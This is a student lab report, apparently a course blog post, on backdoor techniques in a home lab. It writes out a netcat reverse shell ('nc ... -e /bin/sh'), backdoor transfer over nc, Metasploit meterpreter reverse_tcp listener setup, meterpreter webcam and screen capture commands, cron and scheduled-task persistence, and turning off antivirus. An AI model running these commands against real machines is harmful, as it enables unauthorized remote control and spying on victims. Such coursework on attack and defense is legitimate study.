20222425 2024-2025-1《网络与系统攻防技术》 实验二实验报告

目录
1.实验内容
2.实验问题
3.实验过程
3.1 windows下使用netcat获取kali的Shell,用cron命令启动某项任务
3.1.1 使用netcat 获取kali的shell
3.1.2 用cron命令启动某项任务
3.2 kali下使用socat获取windows的Shell, 用schtasks命令创建并启动某项任务计划
3.2.1 实验准备
3.2.2 使用socat获取windows的Shell
3.2.3 用schtasks命令创建并启动某项任务计划
3.2.4 查看任务计划执行情况
3.3 使用MSF meterpreter生成后门文件,利用ncat或socat传送到主机并运行,获取主机Shell
3.3.1 实验准备
3.3.2 使用MSF meterpreter生成后门文件
3.3.3 利用ncat或socat将后门文件传送到主机
3.3.4 进入kali的MSF控制台,开始准备监听
3.3.5 kali保持监听,windows上打开后门程序,成功获取shell
3.4 使用MSF meterpreter生成后门文件,获取目标主机音频、摄像头、击键记录等内容,并尝试提权
3.4.1 查看获取windows的shell后可以进行的渗透操作
3.4.2 获取系统信息、当前屏幕,摄像头抓拍照片

3.4.3 尝试提权
3.4.4 尝试获取破解密码
3.5 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
3.5.1 使用MSF生成shellcode
3.5.2 构造攻击字符串并运行pwn20222425文件
3.5.3 成功获取shell
4.问题及解决方案
5.学习感悟、思考等
参考资料
2.实验问题
例举你能想到的一个后门进入到你系统中的可能方式?
类似于实践1中的pwn1,一些软件可能存在安全漏洞,攻击者可以利用这些漏洞将后门文件注入到我的系统中。
例举你知道的后门如何启动起来(win及linux)的方式?
Windows
①作为服务被安装后自动运行。
②创建计划任务,以便在特定条件下自动运行。
③后门可以将自己复制到Windows启动文件夹中,例如C:\Users{用户名}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup,以确保在用户登录后自动运行。
Linux
创建cron作业定期执行。
Meterpreter有哪些给你映像深刻的功能?
远程shell、屏幕/摄像头获取、提权后破解密码。
如何发现自己有系统有没有被安装后门?
①使用安全扫描工具(如火绒杀毒软件)对系统进行全面扫描。
②审查系统日志查找异常活动的迹象。
③定期检查文件系统。
3.实验过程
3.1使用netcat获取主机操作Shell,cron启动某项任务
3.1.1在主机和虚拟机上都安装netcat。
3.1.2Windows主机使用netcat 获取kali的shell
windows: ncat -l -p 2425[端口号]
linux: nc 192.168.96.221[windows ip] 2425 -e /bin/sh


3.1.3 用cron命令启动某项任务

如图为具体代码,其任务是每分钟向20222425_shiyan2中添加20222425。

3.2使用socat获取主机操作Shell, 任务计划启动
3.2.1关闭电脑的杀毒软件和防火墙
3.2.2在主机和虚拟机都下载socat
3.2.3按下win+R输入compmgmt.msc打开计算机管理,并创建名为20222425EXp2的任务,触发器设为当用户站锁定时,启动程序为socat,添加路径为socat.exe所在位置。



按下win+l重新解锁就能看见socat程序启动


3.3使用MSF meterpreter生成后门文件,利用ncat或socat传送到主机并运行,获取主机Shell
3.3.1 使用MSF meterpreter生成后门文件

3.3.2利用ncat或socat将后门文件传送到主机
┌──(root㉿kali)-[/home/kali]
└─# nc 192.168.31.128 2425 < 20222425backdoor //文件要传给windows,ip地址为windows地址
D:\ncat>ncat.exe -l -p 2425 > 20222425backdoor.exe

3.3.3进入kali的MSF控制台,开始准备监听


msfconsole //进入MSF控制台
use exploit/multi/handler //使用监听模块
set payload windows/meterpreter/reverse_tcp //使用和生成后门程序时相同的payload
set LHOST 192.35.130 //和之前生成后门程序时设置的kali的IP相同
set LPORT 2425 //和之前生成后门程序时设置的端口相同
show options //显示参数配置情况,检查参数是否正确设置
exploit //开启监听
3.3.4kali保持监听,windows上打开后门程序,成功获取shell

3.4使用MSF meterpreter生成后门文件,获取目标主机音频、摄像头、击键记录等内容,并尝试提权(从上一步继续即可)
3.4.1获取系统信息、当前屏幕,摄像头抓拍照片等
meterpreter > sysinfo
meterpreter > screenshare
meterpreter > webcam_snap



3.5使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
3.5.1生成shellcode文件

3.5.2然后输入msfconsole指令,依次输入以下指令
use exploit/multi/handler #进入handler模式
set payload linux/x86/meterpreter/reverse_tcp #对应生成的后门程序设置payload
set LHOST 192.168.35.130 #LHOST
set LPORT 2425 #端口号

3.5.3打开另一个终端,升权并执行pwn文件


结果如图:

4问题及解决方案
问题1.任务一和任务二下载所需的netcat和socat时未关闭杀毒软件和防火墙,安装包解压后呗提醒危险并被清理。
解决方法:将杀毒软件关闭
问题2.通过socat和netcat操作生成的文件也会被杀毒软件清理。
解决方法:将杀毒软件关闭
5.学习感悟和思考
通过本次实验我实践了简单的后门攻击,这让我大为震撼,如果生活中不注意真的很容易遭遇攻击。在这次实验中我使用了necat,socat等工具,通过借鉴学长学姐的实验报告,我也成功复现了每一步操作,并学会了一系列操作,在这次实验中,虽然没有详细的实验指导书,但实验环境并没有改变,实验所需的资源等也都可以通过查询得到,所以这次实验难度小于实验一。同时我深入了解了后门原理,并通过自己生成后门程序、反弹式连接等操作获得了其他主机的访问权与控制权。这一系列操作让我对这门课有了更深的思考。

posted @ 2024-10-21 15:47  20222425  阅读(9)  评论(0编辑  收藏  举报